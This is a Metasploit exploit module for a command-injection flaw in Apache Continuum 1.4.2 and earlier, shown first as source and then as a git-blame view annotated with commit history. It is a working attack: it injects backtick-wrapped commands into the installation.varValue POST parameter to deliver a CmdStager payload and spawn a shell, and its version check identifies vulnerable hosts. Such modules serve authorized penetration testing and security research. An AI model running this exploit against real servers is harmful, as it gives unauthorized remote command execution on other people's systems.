modules/exploits/linux/http/apache_continuum_cmd_exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Apache Continuum Arbitrary Command Execution',
        'Description' => %q{
          This module exploits a command injection in Apache Continuum <= 1.4.2.
          By injecting a command into the installation.varValue POST parameter to
          /continuum/saveInstallation.action, a shell can be spawned.
        },
        'Author' => [
          'David Shanahan', # Proof of concept
          'wvu'             # Metasploit module
        ],
        'References' => [
          %w{CVE 2016-15057},
          %w{EDB 39886},
        ],
        'DisclosureDate' => '2016-04-06',
        'License' => MSF_LICENSE,
        'Platform' => 'linux',
        'Arch' => [ARCH_X86, ARCH_X64],
        'Privileged' => false,
        'Targets' => [
          ['Apache Continuum <= 1.4.2', {}]
        ],
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([
      Opt::RPORT(8080)
    ])
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => '/continuum/about.action'
    )

    if res && res.body.include?('1.4.2')
      CheckCode::Appears
    elsif res && res.code == 200
      CheckCode::Detected
    else
      CheckCode::Safe
    end
  end

  def exploit
    print_status('Injecting CmdStager payload...')
    execute_cmdstager
  end

  def execute_command(cmd, opts = {})
    send_request_cgi(
      'method' => 'POST',
      'uri' => '/continuum/saveInstallation.action',
      'vars_post' => {
        'installation.name' => Rex::Text.rand_text_alpha(8),
        'installation.type' => 'jdk',
        'installation.varValue' => '`' + cmd + '`'
      }
    )
  end
end
Add Apache Continuum exploit 2016-06-09 17:41:05 -05:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Add Apache Continuum exploit 2016-06-09 17:41:05 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`class MetasploitModule < Msf::Exploit::Remote`
			`Rank = ExcellentRanking`

			`include Msf::Exploit::Remote::HttpClient`
Convert to CmdStager 2016-06-10 18:25:55 -05:00			`include Msf::Exploit::CmdStager`
Add Apache Continuum exploit 2016-06-09 17:41:05 -05:00
			`def initialize(info = {})`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`super(`
			`update_info(`
			`info,`
			`'Name' => 'Apache Continuum Arbitrary Command Execution',`
			`'Description' => %q{`
			`This module exploits a command injection in Apache Continuum <= 1.4.2.`
			`By injecting a command into the installation.varValue POST parameter to`
			`/continuum/saveInstallation.action, a shell can be spawned.`
			`},`
			`'Author' => [`
			`'David Shanahan', # Proof of concept`
			`'wvu' # Metasploit module`
			`],`
			`'References' => [`
add CVE reference to Continuum exploit 2026-01-26 12:36:12 +01:00			`%w{CVE 2016-15057},`
			`%w{EDB 39886},`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`],`
			`'DisclosureDate' => '2016-04-06',`
			`'License' => MSF_LICENSE,`
			`'Platform' => 'linux',`
			`'Arch' => [ARCH_X86, ARCH_X64],`
			`'Privileged' => false,`
			`'Targets' => [`
			`['Apache Continuum <= 1.4.2', {}]`
			`],`
Adds sentinel values to modules missing notes 2025-06-23 12:00:29 +01:00			`'DefaultTarget' => 0,`
			`'Notes' => {`
Update info -d markdown 2025-06-23 12:43:46 +01:00			`'Reliability' => UNKNOWN_RELIABILITY,`
			`'Stability' => UNKNOWN_STABILITY,`
			`'SideEffects' => UNKNOWN_SIDE_EFFECTS`
Adds sentinel values to modules missing notes 2025-06-23 12:00:29 +01:00			`}`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`)`
			`)`
Add Apache Continuum exploit 2016-06-09 17:41:05 -05:00
			`register_options([`
			`Opt::RPORT(8080)`
			`])`
			`end`

			`def check`
			`res = send_request_cgi(`
			`'method' => 'GET',`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'uri' => '/continuum/about.action'`
Add Apache Continuum exploit 2016-06-09 17:41:05 -05:00			`)`

			`if res && res.body.include?('1.4.2')`
			`CheckCode::Appears`
			`elsif res && res.code == 200`
			`CheckCode::Detected`
			`else`
			`CheckCode::Safe`
			`end`
			`end`

			`def exploit`
Convert to CmdStager 2016-06-10 18:25:55 -05:00			`print_status('Injecting CmdStager payload...')`
Remove apache_continuum_cmd_exec CmdStager flavor 2016-12-27 16:21:42 -06:00			`execute_cmdstager`
Convert to CmdStager 2016-06-10 18:25:55 -05:00			`end`

			`def execute_command(cmd, opts = {})`
Add Apache Continuum exploit 2016-06-09 17:41:05 -05:00			`send_request_cgi(`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'method' => 'POST',`
			`'uri' => '/continuum/saveInstallation.action',`
Add Apache Continuum exploit 2016-06-09 17:41:05 -05:00			`'vars_post' => {`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'installation.name' => Rex::Text.rand_text_alpha(8),`
			`'installation.type' => 'jdk',`
Convert to CmdStager 2016-06-10 18:25:55 -05:00			'installation.varValue' => '`' + cmd + '`'
Add Apache Continuum exploit 2016-06-09 17:41:05 -05:00			`}`
			`)`
			`end`
			`end`